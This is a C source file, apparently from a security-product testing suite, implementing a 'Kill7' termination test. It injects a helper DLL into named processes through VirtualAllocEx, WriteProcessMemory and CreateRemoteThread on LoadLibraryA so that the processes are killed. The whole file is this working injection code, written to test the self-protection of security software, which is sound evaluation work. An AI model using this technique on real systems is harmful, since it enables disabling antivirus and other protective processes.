/*

 Security Software Testing Suite - Kill7 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * This technique is used by Advanced Process Termination - Kill 11, written by Diamond Computer Systems,
     http://www.diamondcs.com.au/.


 Method description:

   * Obtain the Debug privilege.

   * Open the target process, allocate memory in it and write a name of the helper DLL to it.

   * Create a new thread inside the target process and point it to LoadLibrary API. When the new thread is
     executed it loads the helper DLL, which terminates the target process.

   * This test works with a list of processes and reports success if in at least one process a new thread was created.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_CONF conf;
  if (!com_console_init_main("Kill7","kill7",argc,argv,&conf,COM_TEST_TYPE_KILL7)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  if (!com_privilege_enable_debug(&err_inf))
    com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);


  char cur_path[MAX_PATH];
  if (com_get_module_path(NULL,cur_path,sizeof(cur_path),&err_inf))
  {
    char dll_path[MAX_PATH];
    snprintf(dll_path,sizeof(dll_path),"%s\\killdll.dll",cur_path);
    dll_path[sizeof(dll_path)-1]='\0';
    size_t dll_path_len=strlen(dll_path);

    if (com_verbosity_get()) printf("Helper DLL path is \"%s\".\n",dll_path);

    HMODULE kernel=GetModuleHandle("kernel32.dll");
    if (kernel)
    {
      if (com_verbosity_get()) printf("\"kernel32.dll\" found at 0x%p.\n",kernel);

      void *LoadLibrary_addr=GetProcAddress(kernel,"LoadLibraryA");
      if (LoadLibrary_addr)
      {
        if (com_verbosity_get()) printf("\"LoadLibraryA\" found in \"kernel32.dll\" at 0x%p.\n\n",LoadLibrary_addr);

        ULONG pids[conf.processes_cnt];
        int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
        if (ret)
        {
          for (int i=0;i<conf.processes_cnt;i++)
          {
            ULONG pid=pids[i];

            if (pid!=COM_CID_INVALID)
            {
              if (com_verbosity_get()) printf("Process \"%s\" found with PID %ld.\n",conf.processes[i],pid);

              HANDLE proc=NULL;
              if (com_process_open(pid,PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION
                                   | PROCESS_VM_WRITE | PROCESS_VM_READ,TRUE,TRUE,&proc,&err_inf))
              {
                int mem_used=FALSE;
                void *rem_mem=VirtualAllocEx(proc,NULL,dll_path_len+1,MEM_COMMIT,PAGE_READWRITE);
                if (rem_mem)
                {
                  if (com_verbosity_get()) printf("%d bytes allocated in process \"%s\" (PID %ld) at 0x%p.\n",
                                                  dll_path_len+1,conf.processes[i],pid,rem_mem);

                  if (WriteProcessMemory(proc,rem_mem,dll_path,dll_path_len+1,NULL))
                  {
                    if (com_verbosity_get()) printf("Helper DLL name written to process \"%s\" (PID %ld).\n",
                                                    conf.processes[i],pid);

                    HANDLE thread=CreateRemoteThread(proc,NULL,0,LoadLibrary_addr,rem_mem,0,NULL);
                    if (thread)
                    {
                      if (com_verbosity_get()) printf("New thread created in process \"%s\" (PID %ld).\n",conf.processes[i],pid);

                      printf("Process \"%s\" (PID %ld) will be terminated.\n",conf.processes[i],pid);
                      mem_used=TRUE;

                      CloseHandle(thread);
                    } else com_err_set_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX,"Unable to create a new thread in process \"%s\" (PID %ld).\n",
                                                   conf.processes[i],pid);
                  } else com_err_set_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX,"Unable to write data to process \"%s\" (PID %ld) at 0x%p.\n",
                                                 conf.processes[i],pid,rem_mem);

                  if (!mem_used) VirtualFreeEx(proc,rem_mem,0,MEM_RELEASE);
                } else com_err_set_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX,"Unable to allocate memory in process \"%s\" (PID %ld).\n",
                                               conf.processes[i],pid);

                CloseHandle(proc);
              } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

              if (com_verbosity_get()) printf("\n");
            } else if (ret) fprintf(stderr,"ERROR: Unable to find process \"%s\".\n\n",conf.processes[i]);
          }

          res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);
        }
      } else com_err_set(&err_inf,"Unable to get address of \"LoadLibraryA\" in \"kernel32.dll\".\n");
    } else com_err_set(&err_inf,"Unable to find \"kernel32.dll\" in my address space.\n");
  }

  return com_end(res,&err_inf,&conf);
}
